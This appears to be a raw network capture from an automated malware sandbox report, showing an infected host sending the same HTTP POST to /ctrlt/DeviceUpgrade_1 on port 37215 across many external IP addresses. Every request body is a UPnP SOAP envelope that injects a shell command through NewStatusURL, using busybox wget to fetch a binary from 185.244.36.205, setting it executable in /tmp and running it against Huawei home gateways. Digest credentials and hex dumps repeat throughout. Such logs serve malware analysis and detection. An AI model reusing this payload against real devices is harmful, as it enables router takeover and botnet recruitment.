                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1468192.168.2.1542436102.242.145.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472352028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1469192.168.2.1551722138.108.28.6837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472363949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1470192.168.2.155878412.62.211.15737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472415924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1471192.168.2.1533680156.160.157.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472415924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1472192.168.2.1556944156.183.237.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472440004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1473192.168.2.1547882190.132.53.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472453117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1474192.168.2.1545104122.172.111.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472469091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1475192.168.2.1537844122.98.182.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472501993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1476192.168.2.1559458138.39.19.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472893953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1477192.168.2.1544876122.159.8.19337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.473352909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1478192.168.2.153433841.5.102.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.474271059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
